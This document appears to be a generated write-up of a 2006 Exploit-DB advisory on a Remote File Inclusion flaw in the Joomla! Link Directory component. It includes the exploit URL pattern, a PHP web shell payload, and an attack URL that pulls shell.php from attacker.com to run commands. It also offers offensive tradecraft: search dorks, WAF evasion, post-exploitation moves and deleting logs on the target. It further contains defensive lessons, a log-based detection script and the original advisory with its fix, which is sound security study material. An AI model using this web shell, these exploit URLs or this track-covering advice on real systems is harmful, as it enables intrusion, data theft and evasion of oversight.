Exploiting Joomla! Link Directory Component for Remote File Inclusion

What this paper is
This paper details a security vulnerability in an older version of the Joomla! CMS component called "Link Directory". Specifically, it describes a Remote File Inclusion (RFI) flaw in version 1.0.3 and earlier. The author, "camino" from the "Insecurity Research Team", provides a method to exploit this vulnerability to include and execute arbitrary files from a remote server.
Simple technical breakdown
The vulnerability lies in how toolbar.linkdirectory.html.php handles user-supplied input. It does not validate the mosConfig_absolute_path parameter, so an attacker can set it to a URL pointing to a PHP file on a server they control. When the vulnerable script includes that remote file, the code within it is executed on the target Joomla! server. This is a classic Remote File Inclusion (RFI) vulnerability.
Complete code and payload walkthrough
The provided paper does not contain executable code or shellcode in the traditional sense. Instead, it describes the vulnerable file and provides a URL pattern for exploitation.
Vulnerable File: toolbar.linkdirectory.html.php
- Purpose: This file is part of the "Link Directory" component for Joomla! (and its predecessor, Mambo). It likely handles administrative tasks or display logic related to managing links within the component.
- Behavior: The paper states that this file is vulnerable because it fails to properly validate the mosConfig_absolute_path parameter. This parameter is often used by Joomla! to determine the absolute path to core files or components. By controlling this parameter, an attacker can trick the script into including a file from an external URL.
Exploit URL Pattern:
http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://huh?
- [sitepath]: A placeholder for the domain name or IP address of the target Joomla! website.
- [joomlapath]: A placeholder for the directory where Joomla! is installed on the server (e.g., joomla, public_html/joomla).
- administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php: The path to the vulnerable script within the Joomla! installation.
- ?mosConfig_absolute_path=: The GET parameter that is being manipulated.
- http://huh?: The crucial part. The paper uses http://huh? as a placeholder for a remote URL. In a real attack, this would be replaced with the URL of a malicious PHP file hosted on an attacker-controlled server. The trailing ? is there so that any path fragment the vulnerable script appends after the parameter becomes part of the query string of the remote request rather than part of the file name.
Payload (Conceptual):
The paper doesn't provide the content of the remote PHP file to be included. However, a typical RFI payload in this context would be a simple PHP script designed to execute commands or provide a web shell. For example, a remote file might contain:
<?php
// A simple web shell payload
echo "<pre>";
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
} else {
    echo "Joomla RFI Payload\n";
    echo "Use ?cmd=your_command to execute commands.\n";
}
echo "</pre>";
?>
When this file is included by the vulnerable Joomla! script, the attacker could then navigate to:
http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://attacker.com/shell.php&cmd=ls -la
This would cause the shell.php file on attacker.com to be executed, and the ls -la command would be run on the target server, with its output displayed in the browser.
Mapping:
- toolbar.linkdirectory.html.php: The vulnerable script.
- mosConfig_absolute_path: The vulnerable parameter.
- http://[remote_server]/[malicious_file.php]: The attacker-controlled file to be included and executed.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated remote access. This vulnerability can be triggered by any user who can send a GET request to the target URL.
- Lab Preconditions:
- A target Joomla! installation with the "Link Directory" component (version <= 1.0.3) installed.
- A controlled remote server (e.g., a VPS, cloud instance) capable of hosting a PHP file.
- A firewall or network configuration that allows the target server to make outbound HTTP requests to the attacker's remote server.
- Tooling Assumptions:
- A web browser for manual testing or crafting requests.
- A vulnerability scanner that can identify RFI vulnerabilities (though manual verification is always recommended).
- A tool like curl or wget for staging payloads on the attacker's server.
- A simple text editor for creating the malicious PHP payload.
- Execution Pitfalls:
- WAF/IPS Evasion: Modern Web Application Firewalls (WAFs) and Intrusion Prevention Systems (IPS) may detect common RFI patterns. Obfuscation techniques might be necessary.
- PHP Configuration (allow_url_fopen): The target server's PHP configuration must have allow_url_fopen enabled for RFI to work. If this is disabled, the vulnerability becomes a Local File Inclusion (LFI) if the attacker can control the path to a local file.
- URL Encoding: Special characters in the payload or URL might need URL encoding.
- Firewall Restrictions: The target server might have outbound firewall rules preventing it from connecting to external URLs.
- Component Not Installed: The "Link Directory" component might not be installed on the target Joomla! instance.
- Version Mismatch: The target Joomla! or component version might be patched or a different version than expected.
- Tradecraft Considerations:
- Reconnaissance: Confirm the presence and version of the "Link Directory" component. Use search engines with dorks like inurl:"com_linkdirectory" and check version indicators if available.
- Payload Staging: Host the malicious PHP payload on a reliable server. Consider using a domain that doesn't immediately raise suspicion.
- Execution: Craft the exploit URL carefully. Test with simple commands first (e.g., whoami, pwd) before attempting more complex operations.
- Post-Exploitation: If a web shell is established, consider privilege escalation, lateral movement, or data exfiltration based on the engagement scope.
- Covering Tracks: Delete logs on the attacker's server and potentially on the target if access allows.
Where this was used and when
This vulnerability was published in August 2006. At that time, Joomla! and its predecessor Mambo were popular content management systems. This type of RFI vulnerability was common in web applications developed in PHP during the mid-2000s due to less stringent input validation practices. It would have been used in opportunistic attacks against websites running vulnerable versions of Joomla! and this specific component.
Defensive lessons for modern teams
- Input Validation is Paramount: Always validate and sanitize all user-supplied input, especially when it's used in file inclusion or path operations.
- allow_url_fopen and allow_url_include: Be aware of the implications of these PHP directives. For RFI, allow_url_fopen must be enabled. allow_url_include (which is often disabled by default and deprecated) would be even more dangerous if enabled. It's generally recommended to disable allow_url_fopen unless absolutely necessary and to never enable allow_url_include.
- Secure Coding Practices: Developers should follow secure coding guidelines, such as the OWASP Top 10, and regularly review their code for common vulnerabilities like RFI, SQLi, XSS, etc.
- Patch Management: Keep all CMS platforms, components, plugins, and themes updated to the latest secure versions.
- Web Application Firewalls (WAFs): Deploy and properly configure WAFs to detect and block common attack patterns, including RFI attempts.
- Least Privilege: Ensure web server processes run with the minimum necessary privileges.
- File Inclusion Safeguards: If file inclusion is a necessary feature, implement strict allowlists for included files and ensure they are not sourced from user-controlled input.
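Detection logic for the exploit URL pattern shown earlier and for the WAF/monitoring lesson here, as an added example that is not from the advisory or the Link Directory component: it parses constructed combined-format access-log lines, percent-decodes the query string (twice, to catch double encoding), and flags requests to the toolbar script whose mosConfig_absolute_path points at a remote stream wrapper or overrides the path at all. The second watched parameter name (mosConfig_live_site) and the log lines are assumptions.

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/Nginx "combined" log format: client ident user [time] "request" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
VULN_SCRIPT = "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php"
# Config globals a client should never supply (the second name is an assumed sibling).
WATCHED_PARAMS = {"mosconfig_absolute_path", "mosconfig_live_site"}
# Stream wrappers that make an include fetch attacker-controlled content.
REMOTE_SCHEME_RE = re.compile(r"^\s*(https?|ftps?|php|data|expect)\s*:", re.IGNORECASE)

def rfi_finding(line: str) -> Optional[dict]:
    """Classify one access-log line; None means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith(VULN_SCRIPT):
        return None
    # parse_qsl percent-decodes once; unquote again to catch double encoding.
    for key, raw in parse_qsl(url.query, keep_blank_values=True):
        if key.lower() not in WATCHED_PARAMS:
            continue
        value = unquote(raw)
        kind = "remote_include" if REMOTE_SCHEME_RE.match(value) else "path_override"
        return {"ip": m.group("ip"), "time": m.group("ts"), "param": key,
                "include_source": value, "kind": kind, "status": int(m.group("status"))}
    return None

def scan(lines) -> list:
    """Collect the findings for an iterable of log lines."""
    return [f for f in map(rfi_finding, lines) if f]

# Constructed sample log: the advisory's placeholder probe, a double-encoded
# variant, a local path override, a benign component request, an unrelated page.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Aug/2006:10:01:02 +0000] "GET /joomla' + VULN_SCRIPT +
    '?mosConfig_absolute_path=http://huh? HTTP/1.0" 200 512 "-" "curl/7.15"',
    '198.51.100.7 - - [18/Aug/2006:10:01:09 +0000] "GET /joomla' + VULN_SCRIPT +
    '?mosConfig_absolute_path=http%253A%252F%252Fexample.org%252Fs.txt%253F HTTP/1.0" 200 512 "-" "curl/7.15"',
    '203.0.113.9 - - [18/Aug/2006:10:02:30 +0000] "GET /joomla' + VULN_SCRIPT +
    '?mosConfig_absolute_path=/var/www/joomla HTTP/1.0" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.44 - admin [18/Aug/2006:10:03:00 +0000] "GET /joomla' + VULN_SCRIPT +
    '?task=edit&id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [18/Aug/2006:10:03:05 +0000] "GET /joomla/index.php?option=com_content HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]
```

A 200 status on a flagged line does not prove the include succeeded (the script returns 200 even when allow_url_fopen is off), so treat hits as triage leads and confirm against outbound-connection logs from the web server.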
ASCII visual (if applicable)
+-----------------+ +-------------------------------------------------+
| Attacker Server | | Target Joomla! Server |
| (e.g., attacker.com)| | (e.g., target.com/joomla) |
| | | |
| +-------------+ | | +---------------------------------------------+ |
| | Malicious | | | | Web Server (Apache/Nginx) | |
| | PHP Payload | |<-----| | | |
| +-------------+ | | | +-----------------------------------------+ | |
+-----------------+ | | | PHP Interpreter | | |
| | | | | |
| | | +-------------------------------------+ | | |
| | | | com_linkdirectory/ | | | |
| | | | toolbar.linkdirectory.html.php | | | |
| | | | (Vulnerable Script) | | | |
| | | | | | | |
| | | | Reads mosConfig_absolute_path | | | |
| | | | parameter from GET request | | | |
| | | | | | | |
| | | | Includes remote file if | | | |
| | | | allow_url_fopen is ON | | | |
| | | +-------------------------------------+ | | |
| | +-----------------------------------------+ | |
| +---------------------------------------------+ |
+-------------------------------------------------+
Source references
- Paper ID: 2214
- Paper Title: Joomla! Component Link Directory 1.0.3 - Remote File Inclusion
- Author: camino
- Published: 2006-08-18
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2214
- Raw Exploit URL: https://www.exploit-db.com/raw/2214
Original Exploit-DB Content (Verbatim)
.:[ insecurity research team ]:.
.__..____.:.______.____.:.____ .
.:. | |/ \:/ ___// __ \:/ _\.:.
: | | | \\____\\ ___/\ /__ :. .
..: |__|___| /____ >\___ >\___ >.:
.:.. .. .\/ .:\/:. .\/. .:\/:
. ...:. .advisory. .:...
:..................: 18.o8.2oo6 ..
Affected Application: Link Directory <= v1.0.3
(Mambo/Joomla CMS Component)
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discoverd by: camino
Team: Insecurity Research Team
URL: http://www.insecurityresearch.org
E-Mail: camino[at]sexmagnet[dot]com
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Typ: Remote [x] Local [ ]
Remote File Inclusion [x] SQL Injection [ ]
Level: Low [ ] Middle [x] High [ ]
Application: Link Directory
Version: <= 1.0.3
Vulnerable File: toolbar.linkdirectory.html.php
URL: http://www.sonerekici.com
Description: It's a component to publish links.
Dork: inurl:"com_linkdirectory"
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://huh?
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
o1.) open toolbar.linkdirectory.html.php
o2.) add this after line 8:
defined( '_VALID_MOS' ) or
die( 'Direct Access to this location is not allowed.' );
o3.) done!
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)
# milw0rm.com [2006-08-18]